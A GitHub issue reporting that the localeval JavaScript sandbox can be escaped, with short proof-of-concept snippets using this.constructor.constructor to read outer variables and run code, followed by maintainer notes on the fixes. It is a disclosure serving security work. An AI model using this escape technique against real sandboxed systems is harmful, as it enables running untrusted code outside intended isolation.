Sandbox can be broken #9

CapacitorSet · 2017-09-22T00:39:43Z

On both Node.js and the browser the sandbox can be trivially broken, i.e. one can access variables outside the sandbox and execute non-sandboxed code.

Proof of concept for variable access:

var le = require("localeval");
var hiddenVariable = 123; // It shouldn't be accessible from inside the sandbox, right?
console.log(le("this.constructor.constructor('return hiddenVariable')()")); // Prints "123"

Proof of concept for code execution on Node.js:

var le = require("localeval");
le("this.constructor.constructor('process.exit(0)')()");
console.log("This is never executed.");

Proof of concept for code execution on the browser:

le("this.constructor.constructor('alert(\'Hello!\')')()");

Credit to vm2 for exposing this attack method.

The text was updated successfully, but these errors were encountered:

We were calling the function with fn.apply(0, ...) which caused the `this` object to be a number, leaking the Number prototype into the environment and allowing access to outside variables. We instead now use an object with no prototype. It incidentally tackles part of #9 in the browser context.

This protects from a vulnerability related to #9. Ensuring the code runs in a process with no rights, ensure that any vulnerability cannot get undue access, thanks to OS-level protections. It is a strong safety guarantee.

espadrine closed this as completed in 15add29 Oct 2, 2021

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Sandbox can be broken #9

Sandbox can be broken #9

CapacitorSet commented Sep 22, 2017 •

edited

Sandbox can be broken #9

Sandbox can be broken #9

Comments

CapacitorSet commented Sep 22, 2017 • edited

CapacitorSet commented Sep 22, 2017 •

edited